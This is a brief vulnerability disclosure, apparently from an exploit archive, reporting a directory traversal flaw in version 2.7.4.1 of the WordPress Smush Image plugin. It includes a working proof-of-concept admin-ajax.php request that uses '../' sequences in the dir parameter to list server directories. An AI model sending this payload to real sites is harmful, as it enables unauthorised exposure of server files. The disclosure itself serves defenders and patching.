WordPress Smush Image plugin version 2.7.4.1 suffers from a directory traversal vulnerability.
21db7b5485a4de9d8322d67427bf0278edc32447bfb7c5844a7851f081d16ba2
Class File transversal
Remote Yes
Credit Ricardo Sanchez
Smush Image Wordpress WP plugin is prone to file transversal vulnerability
because it fails to sufficiently folders privacy.
To exploit this issue following steps:
Demo url:
http://localhost/wordpress/wp-admin/admin-ajax.php?dir=../../../../../../&multiSelect=true&action=smush_get_directory_list&list_nonce=xxxxxxx
Confirm:
https://wordpress.org/support/topic/file-transversal-bug/#post-9554401